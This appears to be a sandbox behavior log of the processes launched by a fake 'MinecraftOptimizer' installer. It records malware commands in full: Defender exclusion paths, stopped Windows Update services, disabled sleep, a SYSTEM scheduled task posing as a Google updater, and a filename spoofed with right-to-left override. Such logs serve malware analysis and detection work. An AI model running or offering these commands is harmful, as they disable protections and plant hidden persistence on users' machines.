powercfg /x -hibernate-timeout-ac 0
3⤵
- Power Settings
PID:2156

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Power Settings
PID:5044

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Power Settings
PID:6852

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Power Settings
PID:6900

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mcggbf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5392

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3472

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
2⤵
PID:7100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4772

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5404

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:6028

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6092

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:2544

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2924

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:6200

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:6316

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:6400

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Power Settings
PID:6572

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6544

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Power Settings
PID:6492

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Power Settings
PID:6640

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Power Settings
PID:7116

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Power Settings
PID:5952

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:6512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mcggbf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6496

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3856

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:4968

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\MinecraftOptimizer.msi"
2⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:6724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3924

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5228

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:3428

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4404

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4800

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:3272

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:768

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:6432

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4960

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Power Settings
PID:1420

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5124

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Power Settings
PID:2884

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Power Settings
PID:1428

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Power Settings
PID:1100

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Power Settings
PID:4408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mcggbf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5884

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6224

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
2⤵
PID:5564

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1436

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2152

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:3300

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2624

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4408

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:6624

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:860

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3444

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:6704

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Power Settings
PID:1788

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3044

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Power Settings
PID:6576

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Power Settings
PID:6508

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Power Settings
PID:5652

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Power Settings
PID:6984

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:5924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mcggbf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5904

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3516

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3744

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3980

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Checks SCSI registry key(s)
- Suspicious use of UnmapMainImage
PID:1996

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4820

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:2500

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1968

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:3560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=127.0.6533.89 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=127.0.2651.86 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ff9c6fbd198,0x7ff9c6fbd1a4,0x7ff9c6fbd1b0
2⤵
PID:4468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1916,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
2⤵
PID:2104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=1288,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:1
2⤵
PID:2276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4696,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=4892 /prefetch:1
2⤵
PID:4972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5376,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:8
2⤵
PID:2300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5416,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:8
2⤵
PID:3044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6132,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=6100 /prefetch:8
2⤵
PID:4476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=6220,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:1
2⤵
PID:2852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5168,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=4160 /prefetch:8
2⤵
PID:4472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --field-trial-handle=5208,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=6488 /prefetch:8
2⤵
PID:1192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=4892,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:1
2⤵
PID:1080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=6472,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=6948 /prefetch:8
2⤵
PID:644

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\MinecraftOptimizer.msi"
2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2080

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\MinecraftOptimizer.msi"
2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=6964,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=6956 /prefetch:8
2⤵
PID:5132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:2392

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:1764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:2976

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4336

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4236

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:2280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:3112

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1264

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:5424

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 87AC1837ACD225205D5410D54925AD79
2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5508

C:\Windows\SysWOW64\ICACLS.EXE
"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-2ba3be5a-6da4-4233-8629-047de1ee3512\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5772

C:\Windows\SysWOW64\EXPAND.EXE
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5832

C:\Users\Admin\AppData\Local\Temp\MW-2ba3be5a-6da4-4233-8629-047de1ee3512\files\MinecraftOptimizer.exe
"C:\Users\Admin\AppData\Local\Temp\MW-2ba3be5a-6da4-4233-8629-047de1ee3512\files\MinecraftOptimizer.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5904

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Minecraft.jar"
4⤵
PID:6012

C:\Users\Admin\AppData\Local\Temp\RarSFX0\MinecraftOptimizer‮raj.scr
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\MinecraftOptimizer‮raj.scr" /S
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2700

C:\Windows\SysWOW64\ICACLS.EXE
"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-2ba3be5a-6da4-4233-8629-047de1ee3512\." /SETINTEGRITYLEVEL (CI)(OI)LOW
3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5428

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Suspicious use of SetWindowsHookEx
PID:5416

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C86DCF6AE2F01CC70276FD4D47790978
2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6940

C:\Windows\SysWOW64\ICACLS.EXE
"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-d2dcc52d-8e02-4ce9-9283-f0b9e0f0e818\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:7072

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:7160

C:\Windows\SysWOW64\EXPAND.EXE
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3628

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Suspicious use of SetWindowsHookEx
PID:3060

C:\Users\Admin\AppData\Local\Temp\MW-d2dcc52d-8e02-4ce9-9283-f0b9e0f0e818\files\MinecraftOptimizer.exe
"C:\Users\Admin\AppData\Local\Temp\MW-d2dcc52d-8e02-4ce9-9283-f0b9e0f0e818\files\MinecraftOptimizer.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:468

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Minecraft.jar"
4⤵
PID:5516

C:\Users\Admin\AppData\Local\Temp\RarSFX0\MinecraftOptimizer‮raj.scr
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\MinecraftOptimizer‮raj.scr" /S
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:6832

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
5⤵
PID:1660

C:\Windows\SysWOW64\ICACLS.EXE
"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-d2dcc52d-8e02-4ce9-9283-f0b9e0f0e818\." /SETINTEGRITYLEVEL (CI)(OI)LOW
3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5776

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Suspicious use of SetWindowsHookEx
PID:6356

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3360

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
PID:3740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
PID:5220

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
- Network Service Discovery
PID:6120

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
PID:4488

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2580

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:6312

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:5580

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:6196

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6688

C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:4588

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
1⤵
PID:6740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Checks processor information in registry
PID:3880

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:6572

